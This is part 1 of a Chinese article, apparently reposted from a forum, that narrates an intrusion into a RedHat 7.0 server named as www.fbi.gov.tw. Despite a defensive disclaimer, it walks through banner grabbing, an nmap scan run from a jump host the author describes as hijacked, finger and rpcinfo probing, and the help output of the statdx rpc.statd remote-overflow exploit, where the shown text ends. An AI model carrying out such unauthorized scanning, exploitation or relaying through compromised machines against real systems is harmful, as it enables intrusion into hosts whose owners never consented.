科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道RedHat Linux 操作系统的入侵实例(1)

RedHat Linux 操作系统的入侵实例(1)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

写此文的目的不在于教人入侵,而是为了提高自身的技术和加强网络管理员的安全防范意识。本文主要是围绕UNIX下面的一个小小的服务进程(LPD:网络打印服务)的攻击而进行的。

作者:论坛整理 来源:zdnet网络安全 2007年12月18日

关键字: 系统安全 系统入侵 Linux redhat

  • 评论
  • 分享微博
  • 分享邮件
我写此文的目的不在于教人入侵,而是为了提高自身的技术和加强网络管理员的安全防范意识。仅此而已!粗心大意的网络管理员应该明白:由于你们一个小小的操作失误可能会导致整个网络全面沦陷!本文主要是围绕UNIX下面的一个小小的服务进程(LPD:网络打印服务)的攻击而进行的。

让俺慢慢道来…..
咳…咳…先给我上茶!(什么?! 没有?俺不说了!!)呵呵……开开玩笑,言归正传.首先确定目标,随便找上台湾一个搜索引擎。随便挑一个吧!假设是:www.fbi.gov.tw。^__^

先让俺看看是不是连得上:

C:\ping www.fbi.gov.tw 
Pinging www.fbi.gov.tw[202.106.184.200] with 32 bytes of data:

Reply from 202.106.184.200: bytes=32 time=541ms TTL=244
Reply from 202.106.184.200: bytes=32 time=620ms TTL=244
Reply from 202.106.184.200: bytes=32 time=651ms TTL=244
Reply from 202.106.184.200: bytes=32 time=511ms TTL=244

Ping statistics for 202.106.184.200:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 511ms, Maximum = 651ms, Average = 580ms

嘻嘻—不但连得上,速度还不错……

先telnet看看banner:

C:\>telnet www.fbi.gov.tw

遗失对主机的连接。

哈哈……看来把telnet服务给shut掉了!再试试ftp
C:\>ftp www.fbi.gov.tw
Connected to www.fbi.gov.tw.
220 fbi-www FTP server (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.

User (www.fbi.gov.tw:(none)):

呵~~wu-2.6.1看来有点眉目了。这台机器像是大名鼎鼎的…………对!RedHat7.0!没错就是她了!首先必须确认一下,连上俺的跳板:

C:\>telnet xxx.xxx.xxx.xxx
Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22smp on an i686
login: fetdog
Password:
bash-2.04$

呵呵~~这是我在台湾的一台跳板。RH7的哦!等下我就会告诉你们拿这些肉鸡办法……拿上nmap扫描器,看看其中的奥妙~~~

bash-2.04$nmap -sT -O www.fbi.gov.tw
Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )
WARNING! The following files exist and are readable: /usr/local/sha
-services and ./nmap-services. I am choosing /usr/local/share/nmap/
s for security reasons. set NMAPDIR=. to give priority to files in
irectory
Interesting ports on (www.fbi.gov.tw):
(The 1520 ports scanned but not shown below are in state: closed)
Port State Service
25/tcp open smtp
79/tcp open finger
80/tcp open http
111/tcp open sunrpc
113/tcp open auth
443/tcp open https
513/tcp open login
514/tcp open shell
515/tcp open printer
587/tcp open submission
1024/tcp open kdm

TCP Sequence Prediction: Class=random positive increments
Difficulty=3247917 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.16

Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds

恰恰!!打开的端口还挺多的嘛!不错……不错……。79/tcp finger?呵呵~先看看这个,不过linux没有finger用户列表这个漏洞,不管它俺先看看有没有倒霉鬼。

bash-2.04$finger @www.fbi.gov.tw
[www.fbi.gov.tw]
No one logged on.

shit!怎么会没人!开门!给我开门!:(……再看看111/tcp sunrpc。嘿嘿……近来rpc漏洞风行,不知道RH7这个东东会不会有?管它呢,先看看再说!

bash-2.04$rpcinfo -p www.fbi.gov.tw
program vers proto port service
100000 2 tcp 111 rpcbind
100000 2 udp 111 rpcbind
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100024 1 udp 1025 status
100024 1 tcp 1024 status

看来有rpc.statd服务。等俺来看看能不能远程溢出拿个rootshell。哈哈!这个rpc.statd远程溢出是我在hack.co.za找到的。等俺先来看看帮助。嘻嘻~~

bash-2.04$./statdx -h
statdx by ron1n 
Usage: stat [-t] [-p port] [-a addr] [-l len]
[-o offset] [-w num] [-s secs] [-d type] 
-t attack a tcp dispatcher [udp]
-p rpc.statd serves requests on [query]
-a the stack address of the buffer is 
-l the length of the buffer is [1024]
-o the offset to return to is [600]
-w the number of dwords to wipe is [9]
-s set timeout in seconds to [5]
-d use a hardcoded 
Available types:
0 Redhat 6.2 (nfs-utils-0.1.6-2)
1 Redhat 6.1 (knfsd-1.4.7-7)
2 Redhat 6.0 (knfsd-1.2.2-4)
    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章